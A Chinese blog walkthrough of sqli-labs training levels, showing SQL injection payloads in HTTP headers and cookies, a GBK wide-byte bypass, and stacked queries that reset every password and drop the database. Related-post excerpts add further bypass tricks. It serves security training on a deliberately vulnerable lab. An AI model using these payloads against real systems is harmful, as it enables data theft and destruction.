sqli--labs

已于 2023-09-09 14:23:20 修改
阅读量46 收藏
点赞数
分类专栏: 靶场 文章标签: 安全
于 2023-09-09 10:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cgjil/article/details/132766779
版权

目录

Less-18(HTTP---User-Agent)

1.登录

2.bp抓包

3.查看是否有回显

4.查看错误

5.查看敏感信息

Less-19(HTTP---Referer)

1.登录

2.bp抓包

3.查看是否有回显

4.查看其错误

5.查看敏感信息

Less-20(HTTP---Cookie)

1.登录

2.bp获取

3.是否有显示

4.错误显示

5.敏感信息查询

Less-22(HTTP---base64)

1.登录

2.bp抓包

3.查看是否有回显

4.错误显示

5.敏感信息查询

Less-32(错误注入---gbk)

1.有显示

2.错误显示

3.查看敏感信息(错误注入)

Less-38(堆叠查询)

1.通过堆叠查询,修改所有用户密码为654321

2. 利用堆叠查询删库(危险!实战环境中千万不要)

3. 回复sqli-labs 环境

Less-18(HTTP---User-Agent)

1.登录

image-20230824172350867

image-20230824172421701

2.bp抓包

image-20230824172456145

3.查看是否有回显

User-Agent: xx

image-20230824172621318

4.查看错误

User-Agent: xx'

image-20230824172718858

分隔
User-Agent: xx' and '1'='1

image-20230824172823350

5.查看敏感信息

User-Agent: xx' and updatexml(1,concat(0x5e,(select database()),0x5e),1) and '1'='1

image-20230824173115395

Less-19(HTTP---Referer)

1.登录

image-20230824171341655

2.bp抓包

image-20230824170943730

3.查看是否有回显

Referer: xx

image-20230824171522176

4.查看其错误

Referer: xx'

image-20230824171620498

分隔
Referer: xx' and '1'='1

image-20230824171723137

5.查看敏感信息

Referer: xx' and updatexml(1,concat(0x5e,(select database()),0x5e),1) and '1'='1

image-20230824171932272

Less-20(HTTP---Cookie)

1.登录

image-20230824111654079

image-20230824111709257

2.bp获取

image-20230824111808745

3.是否有显示

Cookie: uname=xx

image-20230824112146392

image-20230824112211992

4.错误显示

Cookie: uname=xx'

image-20230824112310417

5.敏感信息查询

Cookie: uname=xx' and updatexml(1,concat(0x5e,(select database()),0x5e),1) #

image-20230824112647513

Less-22(HTTP---base64)

1.登录

image-20230824112923110

image-20230824113115733

2.bp抓包

image-20230824113136258

3.查看是否有回显

这里为base64编码
RHVtYg%3D%3D
解码
dumb==

image-20230824113225208

image-20230824114718887

image-20230824114758459

Cookie: uname=eHg=
eHg=  : xx

image-20230824115004988

image-20230824115034693

4.错误显示

Cookie: uname=eHgi
eHgi : xx"

image-20230824115359553

5.敏感信息查询

Cookie:uname=eHgiIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg1ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4NWUpLDEpICM=
​
Cookie: uname=xx" and updatexml(1,concat(0x5e,(select database()),0x5e),1) #

image-20230824115513443

Less-32(错误注入---gbk)

1.有显示

?id=1

image-20230824105642578

2.错误显示

?id=2'

image-20230824105825544

因为这里用的是gbk编码
​
GBK范围的编码        8140 - FEFE

image-20230824110000444

?id=2%81'    
gbk编码:815c

image-20230824110302796

3.查看敏感信息(错误注入)

?id=2%81' and updatexml(1,concat(0x5e,(select version()),0x5e),1)   --+

image-20230824111145758

Less-38(堆叠查询)

1.通过堆叠查询,修改所有用户密码为654321

?id=1';update users set password='123456';--+

descript

descript

2. 利用堆叠查询删库(危险!实战环境中千万不要)

?id=5';drop database security;--+

descript

3. 回复sqli-labs 环境

descript

descript

cgjil
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6673
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
sqli-labs靶场搭建
AlienEowynWan的博客
11-17 328
解压放在phpstudy的WWW文件夹
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs26
qq_53030229的博客
06-01 1060
文章目录一、审查源码1、判断注入点和闭合方式2、过滤方式二、SQL注入1、获取数据库 双写绕过:anandd 大小写绕过And ASCII编码绕过 %20、%0a绕过 内联注释:/!**/ 替换:如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代 一、审查源码 1、判断注入点和闭合方式 由于这个是与数据库交互的语句,通过这个判断
Docker安装sqli-labs教程
易编橙 · 终身成长社群,相遇已是上上签!
07-04 1258
Docker安装sqli-labs教程 这是一篇吃低保的水文 前提条件:安装Docker 传送门:Ubuntu 20 安装docker - https://blog.csdn.net/weixin_42250835/article/details/118350609 搜索sqli-labs docker search sqli-labs 拉取镜像 docker pull acgpiano/sqli-labs 查看镜像 docker images 运行镜像 docker ru
Sqli-labs合集之环境搭建
qq_54190167的博客
07-10 283
Sqli-labs的环境搭建
sqli-labs靶场
weixin_72202802的博客
05-19 1012
admin” and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)y)# //floor函数报错。admin' and ascii(substr(database(),1,1))=115# //报错。使用报错注入,后面加,1,1)补全 和#注释 防报错。看提示在密码框注入,报错注入同11。同 less--11。
sqli-labs靶场安装
qq_44624916的博客
02-04 506
小皮phpstudy搭建sqli-labs靶场
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 2312
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs靶场通关攻略
test_zpx的博客
08-14 259
Good Good Study,Day Day Up!
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
浅谈网络安全的认识与学习规划
qq_201729558
09-05 1073
本文主要介绍网络安全认识与学习规划
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 881
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
网站安全需求分析与安全保护工程
最新发布
weixin_49171105的博客
09-09 686
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
智能对决:提示词攻防中的AI安全博弈
weixin_41496173的博客
09-05 1003
在2024年上海AIGC开发者大会上,知名提示词爱好者工程师云中嘉树发表了关于**AI提示词攻防与安全博弈**的精彩演讲。他深入探讨了当前AI产品的安全现状,提示词攻击的常见手段及其应对策略。本文将对他的演讲进行详细的解读与分析,并结合实际案例和技术手段,探讨如何在AI应用开发中提高安全性。
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值